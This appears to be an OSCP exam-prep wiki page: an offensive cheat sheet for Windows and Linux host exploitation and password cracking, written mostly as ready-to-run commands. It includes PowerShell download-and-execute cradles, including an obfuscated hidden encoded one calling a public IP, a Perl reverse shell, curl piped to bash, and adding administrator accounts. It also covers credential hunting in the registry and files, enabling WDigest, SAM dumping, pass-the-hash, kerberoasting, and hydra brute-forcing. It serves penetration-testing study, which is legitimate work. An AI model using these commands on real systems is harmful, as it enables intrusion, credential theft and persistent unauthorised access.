Exploitation (공격)

All you need to know about basic host-based exploitation for OSCP

Windows Exploitiation

Basic commands

Add user

net user $username $password /add

Add a user to a group

net localgroup "$groupname" $username /add

Create an local administrator account

net localgroup administrators $username /add

Find out Windows System Information

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Windows Patch Status

wmic qfe get Caption,Description,HotFixID,InstalledOn

Find Plaintext Password

findstr /si password .txt 
findstr /si password .xml 
findstr /si password *.ini

Find all those strings in config files

dir /s pass == cred == vnc == .config

Find all passwords in all files

findstr /spin "password" . findstr /spin "password" .

Download files from Attacker Box ( Kali ) to the target via powershell

powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.39/rev.ps1')

powershell.exe invoke-webrequest -uri http://$attackerip/nc.exe -outfile C:\users\user\appdata\local\temp\nc.exe

Other downloading and uploading techinques

Download Github repo: https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70

you need to manually edit the powershell script to run itself without -C or -command.

For example, using Invoke-PowerShellTcp.ps1 in /opt/nishang/Shells/Invoke-PowerShellTcp.ps1

Provoke this commmand maually by adding the command at the end of the powershell file.

Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444

You can copy the file to the victim and execute the command just by invoking DownloadString without Powershell –Command argument. This technique is wildly used to create so-called file-less malware where the evil script is executed directly in the memory of the victim machine without dropping any file as such on the harddisk. This technique is used to bypass signature based detection.

powershell.exe “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1')"

Or you can manually invoke the command via powershell string. For example,

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.8:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress $listenerip -Port 4444"

Also for PS version 1 and 2

PS Version 1

c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')"

PS Version 2

c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA

Finding password files in Registry

VNC

reg query "HKCU\Software\ORL\WinVNC3\Password"

Windows autologin

reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName

reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword

Or via Powershell using Get-ItemProperty to exploit registry

PS > Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"

SNMP Paramters

reg.exe query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

Putty

reg.exe query "HKCU\Software\SimonTatham\PuTTY\Sessions"

Search for password in registry

reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s

Finding credentials in Groups.xml

dir Groups.xml /s

On an atttacker box, you can decrypt Group Policy Password via:

gpp-encrpyt $password

Groups.xml can be found under the below path

C:\ProgramData\Microsoft\Group Policy\History{$numbers}\Machine\Preferences\Groups

To find more information: http://www.fuzzysecurity.com/tutorials/16.html

Finding admin credentials from AppData

dir /a C:\Users\$user\AppData\Roaming\Microsoft\Credentials\

Running commands as a different user by using runas command

runas /user:ACCESS\Administrator /savecred "cmd.exe C:\Users\Administrator\Desktop\root.txt > C:\Users\security\AppData\Local\Temp\test.txt"

Enable RDP in Windows Target

C:\Windows\system32>netsh firewall set service remoteadmin enable 
netsh firewall set service remoteadmin enable
Ok.
C:\Windows\system32>netsh firewall set service remotedesktop enable
netsh firewall set service remotedesktop enable
Ok.

Port 88 - Kerberoasting

Once you have a user shell you can start kerberoasting to get other users' credentials.

Without password

python GetUserSPNs.py -request active.htb/SVC_TGS

With password

GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

Then try cracking the Kerberos ticket by

john GetUserSPNsOutput.txt --wordlist=/usr/share/wordlists/rockyou.txt

Then login with psexec.py.

psexec.py [email protected]

You can choose a service for avoiding antivirus detection with --service-name.

psexec.py active.htb/Administrator:[email protected] -service-name LUALL.exe

Exploiting AD users

You should import the 'activedirectory' module first.

Import-module activedirectory

Add an AD member to a Group

add-adgroupmember -Identity "$group" -Members $member

Other Useful commands

Strings prints text strings embedded in binary files such as executables.

root@kali:~/htb/tally# strings tester.exe
!This program cannot be run in DOS mode.
Rich7J
~~~
~~~
SQLSTATE: 
Message: 
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
select * from Orchard_Users_UserPartRecord
~~~
~~~

Transfering file to windows

echo open $attackerip 21> ftp.txt 
echo USER offsec 
password>> ftp.txt 
echo bin>> ftp.txt 
echo GET shell.php >> ftp.txt 
echo bye >> ftp.txt

Then run

ftp -v -n -s:ftp.txt

List out all schedule tasks

schtasks /query /fo LIST /v

And extra misc to check:

Find GPP Passwords in SYSVOL

findstr /S cpassword $env:logonserver\sysvol\*.xml

findstr /S cpassword %logonserver%\sysvol*.xml (cmd.exe)

Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]

runas /user:DOMAIN\USER /noprofile powershell.exe

Insert reg key to enable Wdigest on newer versions of Windows

reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1

Linux Exploitation

Spawing a intereactive TTY linux shell

python -c 'import pty; pty.spawn("/bin/sh")'
export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin

Then Ctrl-Z

stty raw -echo 
fg

Type reset and hit return.

Exploiting Directory

Find any writable directories

find / -type d ( -perm -g+w -or -perm -o+w ) -exec ls -adl {} \;

Or use

find / -writable -type d 2>/dev/null find / -perm -222 -type d 2>/dev/null find / -perm -o w -type d 2>/dev/null

Finding only Executable folders

find / -perm -o x -type d 2>/dev/null

Finding Writable and executable folders

find / ( -perm -o w -perm -o x ) -type d 2>/dev/null

Find commands that allows you to run as root with no password

sudo -l

You'll see the similar result as below. As you can see, User shelly can use /usr/bin.perl as root with no password.

e.g) If you are allowed to use perl command as root, you can get a revese shell stright

sudo perl -e 'use Socket;$i="10.10.14.43";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

If this doesn't give you any hints

Check the kernel versions of the victim machines

uname -ar 
cat /proc/version 
cat /etc/issue 
cat /etc/*-release 
cat /etc/lsb-release # Debian based 
cat /etc/redhat-release # Redhat based

Try googling the kernel version and PE exploits to try out.

Check the bash histroy

cat .bash_history

Check the process it's running

ps aux | grep $service

Finding Plaintext Passwords in web server

Plaintext Password in /var/www/html/*.php

cat /var/www/html/config.php | grep password

In mail

cat /var/spool/mail | grep $item

Or using LinEnum.sh

LinEnum.sh -t -k password

Chekcing the service ti's running

netstat -anlp

GTFOBins

SUID

find / -perm -u=s -type f 2>/dev/null

GUID

find / -perm -g=s -type f 2>/dev/null

Authomation Tools

There are three useful automation tools that I use the most, which are

LinEnum.sh

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

curl http://$attackerip/LinEnum.sh | /bin/bash
chmod +x LinEnum.sh
./LinEnum.sh

pspy

pspy is a command line tool designed to snoop on processes without need for root permissions.

Cron job watching with pspy
~/pspy (master) $ make example

Other useful commands

List out all scheduled tasks

schtasks /query /fo LIST /v

List the capability of a file

getcap -r / 2>/dev/null

Password Cracking

Belw are the Cracking methonlogy used in CTF challanges.

Creating a password list

1) You can create your own dictionary or combing two different wordlists by

cat wordlist >> wordlist2

2) Create a customised wordlist from html page

curl http://example.com > example.txt
html2dic example.txt

Or use Cewl

cewl -w createWordlist.txt -m 6 https://www.example.com

-w is the minimum password length.

Cracking Tools

To identify which hash type it is encrypte with, use either of below commands build in Kali

hash-identifier 
hasid

Online Tools to find Hash Type

http://www.onlinehashcrack.com/hash-identification.php

https://md5hashing.net/hash_type_checker

Cracking Hash

Two Kali built-in tools can be used, hashcat and john.

Hashcat

hashcat -m 13100 -a 0 -o found.txt admin.hash /usr/share/hashcat/rules/rockyou-30000.rule

-m= hash mode, 13100 denotes Kerberos 5 TGS-REP etype 23

-a=mode, 0 denotes straight

-o= output

John the ripper

john --wordlist=wordlist.txt dump.txt

Keepass password

keepass2john CEH.kdbx > crackthis.hash

john --wordlist=wordlist.txt crackthis.hash

Or

hashcat64.exe -m 13400 .\crackthis.hash .\rockyou.txt

Putty key ppk to SSH key

puttygen my_private_key.ppk -O private-openssh -o alice.key
chmod 600 alice.key

Linux shadow password

First you need to combine the passwd file with the shadow file using the unshadow-program.

unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
john --rules --wordlist=wordlist.txt unshadowed.txt

Decoding Base64

cat $encodedfile | base64 --decode > decodedfile.txt

Base64 Decode and Encode - OnlineBase64 Decode

Cracking Unzip file password

fcrackzip -D -p /usr/share/wordlists/rockyou.txt data.zip

Convert Hex to Binary

cat hex.txt | xxd -r -p

Online Tools

CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.

https://hashkiller.co.uk/hashkiller.co.uk

Cracking password for Services

Port 22- SSH

hydra -l root -P wordlist.txt $targetip ssh
hydra -L userlist.txt -P pass.txt ssh://$targetip

Cracking Priave RSA Key

python ssh2john.py user_rsa > crackable.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crackable.txt

Port 161 - SNMP

hydra -P wordlist.txt -v 102.168.0.101 snmp

Port 3389 - RDP

ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101

Port 80/443 htaccess

Password protect directory with htaccess

Step 1

Create a directory that you want to password-protect. Create .htaccess tile inside that directory. Content of .htaccess:

AuthType Basic
AuthName "Password Protected Area"
AuthUserFile /var/www/html/test/.htpasswd
Require valid-user

Create .htpasswd file

htpasswd -cb .htpasswd test admin
service apache2 restart

This will now create a file called .htpasswd with the user: test and the password: admin

If the directory does not display a login-prompt, you might have to change the apache2.conf file. To this:

<Directory /var/www/html/test>
    AllowOverride AuthConfig
</Directory>

Then bruteforce with

medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10

Tomcat Apache

hydra -C /usr/share/seclists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http://10.10.10.95:8080/manager/html

hydra 10.10.10.43 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect*”

Pass The Hash

You can authenticate services by using a valid username and the hash value without a decrypted password.

SMB PTH

export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896

pth-winexe -U administrator //$targetip cmd
pth-winexe -U admin/$hash:has //$targetip cmd

e.g)

pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe

smbclient //$targetip/C$ -U "$targetuser" --pw-nt-bash $hash

RDP PTH

By using evil-winrm https://github.com/Hackplayers/evil-winrm

evil-winrm -u "$targetuser" --hash $hash -i $targetip

By using freerdp-x11

apt-get install freerdp-x11
xfreerdp /u:admin /d:win7 /pth:hash:hash /v:$targetip

Misc: Windows Password check in SAM

You can check two fundamental files from Windows, system registry and SAM registry.

Systemroot can be windows
%SYSTEMROOT%\repair\SAM
windows\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM

System file can be found here
SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system

Then extract the hashed password

pwdump system sam

PreviousEnumeration (정보 수집 및 열거)NextPost Exploitation (후속공격)

Last updated 1 year ago